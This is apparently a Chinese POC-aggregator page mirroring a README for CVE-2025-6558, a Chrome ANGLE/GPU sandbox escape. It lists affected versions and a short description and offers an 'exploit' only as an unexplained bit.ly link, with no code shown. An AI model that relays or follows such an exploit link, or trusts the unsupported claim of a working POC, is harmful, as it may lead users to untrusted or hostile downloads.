POC详情: 24af1a3bf4e07946000381c727d8830291ba5dca

来源
关联漏洞
标题: Google Chrome 输入验证错误漏洞 (CVE-2025-6558)
描述:Google Chrome是美国谷歌(Google)公司的一款Web浏览器。 Google Chrome 138.0.7204.157之前版本存在安全漏洞,该漏洞源于ANGLE和GPU对不可信输入验证不足,可能导致沙箱逃逸。
介绍
# **CVE-2025-6558 - Google Chrome ANGLE/GPU Sandbox Escape**  

| **Field**         | **Details**                                                                 |
|-------------------|-----------------------------------------------------------------------------|
| **CVE ID**        | CVE-2025-6558                                                               |
| **Vulnerability Type** | Sandbox Escape                                                           |
| **Affected Application** | Google Chrome (ANGLE and GPU components)                                |
| **Severity**      | Critical – Enables remote arbitrary code execution and access to sensitive resources |
| **Affected Versions** | Google Chrome versions < `138.0.7204.157`                                 |
| **Exploitation Prerequisites** | User visits a webpage containing malicious WebGL/HTML content          |
| **POC Availability** | Confirmed                                                                 |

---

## Description
CVE-2025-6558 is a critical sandbox escape vulnerability in Google Chrome’s **ANGLE** (Almost Native Graphics Layer Engine) and **GPU components**. Insufficient validation of untrusted inputs in ANGLE/GPU processing allows remote attackers to craft malicious HTML pages that trigger this flaw.

## ⚠️ Disclaimer

This content is provided for **educational and research purposes** only.  
The author does **not condone** malicious activity or exploitation of systems without **explicit authorization**.

---

### Exploit
[**href**](http://bit.ly/4lAFDak)


文件快照

[4.0K] /data/pocs/24af1a3bf4e07946000381c727d8830291ba5dca └── [1.5K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。